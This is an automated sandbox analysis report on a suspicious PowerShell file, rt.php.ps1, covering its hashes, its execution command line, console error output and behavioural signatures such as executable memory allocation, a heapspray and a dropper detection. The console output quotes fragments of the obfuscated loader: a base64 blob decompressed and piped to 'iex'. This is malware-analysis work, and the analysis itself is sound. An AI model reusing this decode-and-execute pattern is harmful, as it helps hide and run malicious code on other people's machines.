Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 6, 2023, 6:16 p.m.	April 6, 2023, 6:18 p.m.

Size	2.8MB
Type	ASCII text, with very long lines, with no line terminators
MD5	`3227cac1eb494c82921cb69be4225f87`
SHA256	`4fd0bcb2413d89915a6884aec025e5a1f1d1e1aa7d6647ede7aed5c7582552e3`
CRC32	`DC652A4C`
ssdeep	`49152:DAPwQ71DrNUWa58/8Xiyhb4TskKe35LAhF:z`
Yara	NPKI_Zero - File included NPKI

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\rt.php.ps1
3064

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (36 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: Method invocation failed because [System.IO.Compression.GZipStream] doesn't con console_handle: 0x00000023	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: tain a method named 'CopyTo'. console_handle: 0x0000002f	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\rt.php.ps1:20 char:29 console_handle: 0x0000003b	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: + $1l6ufjr0zesq53v.CopyTo <<<< ( $gwui8fo932xenzc ) console_handle: 0x00000047	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: + CategoryInfo : InvalidOperation: (CopyTo:String) [], RuntimeExc console_handle: 0x00000053	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: eption console_handle: 0x0000005f	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: + FullyQualifiedErrorId : MethodNotFound console_handle: 0x0000006b	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: Method invocation failed because [System.IO.Compression.GZipStream] doesn't con console_handle: 0x0000008b	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: tain a method named 'CopyTo'. console_handle: 0x00000097	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\rt.php.ps1:20 char:29 console_handle: 0x000000a3	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: + $1l6ufjr0zesq53v.CopyTo <<<< ( $gwui8fo932xenzc ) console_handle: 0x000000af	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: + CategoryInfo : InvalidOperation: (CopyTo:String) [], RuntimeExc console_handle: 0x000000bb	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: eption console_handle: 0x000000c7	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: + FullyQualifiedErrorId : MethodNotFound console_handle: 0x000000d3	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null. console_handle: 0x000000f3	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: Parameter name: bytes" console_handle: 0x000000ff	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\rt.php.ps1:28 char:40 console_handle: 0x0000010b	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: + [System.Text.Encoding]::ascii.GetString <<<< ((n29tc08kuawqrb5vgpyl34jh16d "a console_handle: 0x00000117	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: uVwcWsybzNpc+E9rgCbR3tPwTOQcC3A/TLXdVKE/H7vT7QxUJ9OPxgD1egX8GlFJHwVrClg0ZaThOIG console_handle: 0x00000123	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: /A2XMk9yfbSuQAumeUctIIrE3ev8X+X5BfdPEPKpTsfPWWTG4R5qmHFpSW26SjWn0gzKCeUMTh7PQSS console_handle: 0x0000012f	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: 0M4fdeIlV7ny9SnZX2+rc4FKQJFq3wv/QWZjnPyS7Hyte3MSE2kptS2WrhMqsV8rQ5D2wIPO1mzl6ap console_handle: 0x0000013b	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: hxFEhGysBS4Sh46k68e/v39Remcx8Xnhv5sR2yVBNunReHYC3nT/uzXxGRJUM+ALhKWjKBehLu8uPjK console_handle: 0x00000147	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: 6NW659mBW76F9Vq128o74BdbU/a18DYe9Gn0bP1F6xh94Kjo/K9fYtmaliW3hzuQLgoLvzt2fV+6+BX console_handle: 0x00000153	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: nVDH4ikpO0HmMljsKTmbYAOv2rJO6MxGLqrTCfHoQDIw/ikRz2eSwW3AwtXrEwwyR6f2U1Clpo+Up1H console_handle: 0x0000015f	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: iAn0MKvrllbSdto9g2KMlpNPXl8ZYEYdGmEk9SgJHSP4r4GwsJgnLy7HX8jN6fbXHgT4mGbFd/cFa8/ console_handle: 0x0000016b	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: fDBMJLFvTIaYKI2l821WWn5mgSU3ZrpH1GbBsTgJbQaXTxlwxpN+FvNSZaFTcWNh88mHzpiBmMQx0wr console_handle: 0x00000177	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: azZ7PduXzqozf/6b64O/qqbJvzeX/rWKCpy2CZcBneszhvIwsMaMSoLbP3w73Qe7Xel8IrpPPmMMT4K console_handle: 0x00000183	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: 4qFURnRA/WTA4FaOlMLq6uY+xFocY4kmN0bpVVq/WauBhenxLRAqN7aimOSOpfRK6Pyc+jnf9lcyW5a console_handle: 0x0000018f	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: zlRCJe+vqcVywyaBBr0pt/+DXPPapTGdWu8YpirKmwEBsBrcYUstL3QfkI0c9d3qwKaAd9hy9ZO3HkW console_handle: 0x0000019b	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: O4PX3o807y4kLc0/PzCJlfrfWV4stmSSvRt3ik+k8vvHm+2Egh0eEm6fM40GoWcWvo+Z0ZW+DRufvJp console_handle: 0x000001a7	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: dZP91jgsovFe9aUaYFxbIyQf5y//i9EHTLkn+2TAbmHKTCOd73/rYrXhZORCx8XShzhtoOKKFuettNN console_handle: 0x000001b3	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: CXvtwM6o7Jq8y9uDp9uFHwnajq19C1W3JE5/eafm8+pJ/4e6aWufVK3JA0bHn2QY7ZiyeAED8nWqg1w console_handle: 0x000001bf	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: dbeMImylniDZ06TENVgdX/WzHQeSPvOJirkkEw01BytTx0dJ4RAouLbK9RHrfehF6dmxGwBEzAyZMYd console_handle: 0x000001cb	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: 6/jEcwtyhrjpjDJYv+Wl0VRESJKgWSavetML1taDNt"))\|iex; console_handle: 0x000001d7	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001e3	1	1
WriteConsoleW April 6, 2023, 6:17 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001ef	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey April 6, 2023, 6:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004dc780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 6:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004dc780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 6:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004dc780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 6:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004dc780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 6:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004dc780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 6:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004dc780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 6, 2023, 6:16 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (22 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 6, 2023, 6:16 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:16 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:16 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02689000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:16 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02800000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02811000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02812000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02801000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02802000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02803000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02804000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02805000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05531000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02813000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02814000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 6:17 p.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by one AntiVirus engine on VirusTotal as malicious (1 event)

McAfee-GW-Edition

BehavesLike.PS.Dropper.vg

A potential heapspray has been detected. 70 megabytes was sprayed onto the heap of the powershell.exe process (1 event)

count

1125

name

heapspray

process

powershell.exe

total_mb

length

65536

protection

PAGE_READWRITE

rt.php.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All